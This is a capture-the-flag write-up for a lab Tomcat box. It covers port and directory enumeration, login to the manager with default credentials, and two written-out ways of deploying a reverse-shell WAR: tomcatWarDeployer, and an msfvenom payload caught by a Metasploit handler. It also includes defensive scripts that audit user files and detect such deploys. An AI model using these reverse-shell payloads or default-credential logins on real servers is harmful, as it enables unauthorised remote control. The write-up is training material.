Site just retired, focussed on Tomcat and malicious WAR files! Let's get started.
Enumeration
As always, let's Nmap the box:

# Nmap 7.70 scan initiated Sat Jun 30 19:27:39 2018 as: nmap -sC -sV -oA initial-nmap -p- 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
The initial scan shows that a site is running on 8080 and that it is probably a Tomcat site. Let's connect:
Yep. That's Tomcat alright. Let's start gobuster to see what directories we can find:

sudo gobuster -u http://10.10.10.95:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,pdf,txt,cgi,php

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.95:8080/
[+] Threads      : 10
[+] Wordlist     : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
[+] Extensions   : .html,.pdf,.txt,.cgi,.php
=====================================================
/docs (Status: 302)
/test (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
That /manager part looks interesting. It's also noted in the screenshot above. Let's visit the URL:
It prompts for a user name and password. Let's press Escape to get out of the login. Huh, we're presented with a weird error message.
So the error message shows how to set up a user. As an example, it lists 'tomcat' as the user name and 's3cret' as the password. What happens if we just try these default credentials?
Guess we are lucky :).
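The 401 page quoted above is Tomcat's own example configuration, and the fix on the defensive side is to make sure nobody ever copied it into a live tomcat-users.xml. The following audit script is an added example, not part of the original post or of Tomcat; the sample file it parses is constructed here to mirror that documentation snippet, and the "deploy" account and its password are made up.

```python
import xml.etree.ElementTree as ET

# Constructed tomcat-users.xml modelled on the snippet Tomcat's manager 401 page
# suggests. The "deploy" account is a made-up example of a sane, non-default user.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="both" password="both" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk7!pQ9vL2mZ-constructed" roles="manager-script"/>
</tomcat-users>
"""

# Roles that grant access to the Manager / Host Manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}
# Passwords that appear in Tomcat's documentation and 401 page; WAR deploy tools
# try exactly these first, so they are never acceptable on a manager account.
DOC_EXAMPLE_PASSWORDS = {"s3cret", "tomcat", "password", "admin", "manager"}


def audit_tomcat_users(xml_text):
    """Return (username, issue) pairs for accounts that can reach the Manager app."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter():
        if node.tag.rsplit('}', 1)[-1] != 'user':   # tolerate the default namespace
            continue
        name = node.get('username', '')
        pw = node.get('password', '')
        roles = {r.strip() for r in node.get('roles', '').split(',') if r.strip()}
        if not roles & MANAGER_ROLES:
            continue                                # no manager access: out of scope
        if pw.lower() in DOC_EXAMPLE_PASSWORDS:
            findings.append((name, 'documentation example password'))
        elif pw.lower() == name.lower():
            findings.append((name, 'password equals username'))
        elif len(pw) < 12:
            findings.append((name, 'short password'))
        # Tomcat's manager docs advise keeping the GUI and script roles on
        # separate accounts so a CSRF against the GUI cannot drive the text API.
        if {'manager-gui', 'manager-script'} <= roles:
            findings.append((name, 'manager-gui and manager-script on one account'))
    return findings


if __name__ == '__main__':
    for user, issue in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f'{user}: {issue}')
```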
Exploitation
After doing some research, I ended up at this site, which describes how to create a WAR package that triggers a reverse shell. The post from 2012 explains:
"If we have performed a penetration test against an Apache Tomcat server and we have managed to gain access then we might want to consider to place a web backdoor in order to maintain our access. Apache Tomcat accepts .WAR file types so our backdoor must have this file extension. In case that we don't have a WAR backdoor already in our disposal we can use Metasploit to create one very fast." Searching Metasploit didn't really give me anything useful initially, so I Googled on. I then found the tomcatWarDeployer, which seemed to fit my needs perfectly.
Let's run it:

sudo python tomcatWarDeployer.py -v -U tomcat -P s3cret -H mylocalIPadress -p 1337 10.10.10.95:8080

        tomcatWarDeployer (v. 0.4)
        Apache Tomcat auto WAR deployment & launching tool
        Mariusz B. / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: mylocalIPadress:1337.
DEBUG: Browsing to "http://10.10.10.95:8080/"... Creds: "tomcat:s3cret"
DEBUG: Trying to fetch: "http://10.10.10.95:8080/"
DEBUG: Probably found something: Apache Tomcat/7.0.88
DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager"
DEBUG: Probably found something: Apache Tomcat/7.0.88
DEBUG: Apache Tomcat/7.0.88 Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmpkmv2aR"
DEBUG: Working with Java at version: 10.0.1
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 66) (out= 66)(deflated 0%)
adding: index.jsp(in = 4494) (out= 1686)(deflated 62%)
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpkmv2aR"
DEBUG: Succeeded, invoking it...
DEBUG: Spawned shell handling thread. Awaiting for the event...
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at mylocalIPadress:1337
DEBUG: Socket is binded to local port now, awaiting for clients...
DEBUG: Invoking application at url: "http://10.10.10.95:8080/jsp_app/"
DEBUG: Adding 'X-Pass: 9PHwwfFA9Ald' header for shell functionality authentication.
DEBUG: Incoming client: 10.10.10.95:49195
DEBUG: Application invoked correctly.
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/
INFO: Happy pwning. Here take that password for web shell: '9PHwwfFA9Ald'
INFO: Connected with: nt authority\[email protected]

C:\apache-tomcat-7.0.88> whoami
nt authority\system
Game, set and match.
Another way to do this is to use msfvenom to generate a payload. We then upload the payload and execute it by visiting it. On our end, we set up a listener and upgrade the shell we get to a Meterpreter shell. I got this idea from the following YouTube video:
First, generate the payload:

msfvenom -p java/shell_reverse_tcp LHOST=XXX LPORT=1337 -f war > pwnd.war

sudo msfvenom -p java/shell_reverse_tcp LHOST=mylocalIPadress LPORT=1337 -f war > pwnd.war
Payload size: 13402 bytes
Final size of war file: 13402 bytes
Then, set up a listener to catch the session:

msf exploit(multi/handler) > set LHOST mylocalIPadress
LHOST => mylocalIPadress
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf exploit(multi/handler) > run
Proceed to upload the .war file and visit the appropriate URL to trigger the payload. You should get a shell:

[*] Started reverse TCP handler on mylocalIPadress:1337
[*] Command shell session 1 opened (mylocalIPadress:1337 -> 10.10.10.95:49196) at 2018-07-07 18:46:33 +0000

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
Background session 1? [y/N]  y

After backgrounding the session, you can use the shell_to_meterpreter module to upgrade it:

Name                                    Disclosure Date  Rank    Description
----                                    ---------------  ----    -----------
post/multi/manage/shell_to_meterpreter                   normal  Shell to Meterpreter Upgrade

msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf post(multi/manage/shell_to_meterpreter) > set LPORT 1337
LPORT => 1337
msf post(multi/manage/shell_to_meterpreter) > run
msf post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type             Information                                                                      Connection
  --  ----  ----             -----------                                                                      ----------
  1         shell java/java  Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ...  mylocalIPadress:1337 -> 10.10.10.95:49196 (10.10.10.95)

msf post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
C:\Users\Administrator\Desktop\flags>
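Both routes above (tomcatWarDeployer and the msfvenom WAR) leave the same footprint in Tomcat's access log: an authenticated deploy request to the Manager application followed by a first hit on a context path that never existed before. The detector below is an added example, not part of the original post or of any tool it uses; the log lines are constructed here in Tomcat's default "common" access log pattern, and the baseline set of expected contexts is an assumption a real deployment would replace with its own list.

```python
import re

# Constructed Tomcat access log lines (default "common" pattern); not from the box.
SAMPLE_ACCESS_LOG = """\
10.10.14.3 - - [07/Jul/2018:18:40:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.3 - tomcat [07/Jul/2018:18:40:02 +0000] "GET /manager/html HTTP/1.1" 200 19562
10.10.14.3 - tomcat [07/Jul/2018:18:45:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 21000
10.10.14.3 - - [07/Jul/2018:18:45:11 +0000] "GET /jsp_app/ HTTP/1.1" 200 12
10.10.14.3 - tomcat [07/Jul/2018:18:46:30 +0000] "PUT /manager/text/deploy?path=/pwnd&update=true HTTP/1.1" 200 57
10.10.14.3 - - [07/Jul/2018:18:46:33 +0000] "GET /pwnd/ HTTP/1.1" 200 0
10.10.14.9 - - [07/Jul/2018:18:47:00 +0000] "GET /docs/ HTTP/1.1" 200 8000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Manager endpoints that install a WAR: the text API, the HTML upload form and
# the HTML "deploy from server path" form.
DEPLOY_RE = re.compile(r'^/manager/(?:text/deploy|html/upload|html/deploy)(?:\?|$)')
# Assumed baseline of contexts that legitimately exist on the server.
DEFAULT_BASELINE = frozenset({'ROOT', 'docs', 'examples', 'host-manager', 'manager'})


def context_of(url):
    """First path segment of a request URL, i.e. the Tomcat context name."""
    parts = url.split('?', 1)[0].strip('/').split('/')
    return parts[0] if parts and parts[0] else 'ROOT'


def detect_war_deployments(log_text, baseline=DEFAULT_BASELINE):
    """Flag successful Manager deploys and the first request to any unknown context after one."""
    findings, known, deployed = [], set(baseline), False
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url, status = m['url'], m['status']
        if DEPLOY_RE.match(url) and status == '200':
            deployed = True
            qs_path = re.search(r'[?&]path=([^&]+)', url)   # only the text API names the path
            findings.append({'rule': 'manager_deploy', 'ip': m['ip'], 'user': m['user'],
                             'path': qs_path.group(1) if qs_path else None})
            continue
        ctx = context_of(url)
        if deployed and ctx not in known:
            findings.append({'rule': 'new_context_invoked', 'ip': m['ip'], 'context': ctx})
        known.add(ctx)
    return findings
```

Pairing each deploy with the first request to the new context is what separates an admin rolling out an application from a WAR dropped and immediately triggered by the same client.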
Privilege escalation
Not needed, since you are already SYSTEM. The flags can be found in C:\Users\Administrator\Desktop\flags.
As always, IppSec created an awesome and very informative video about this box.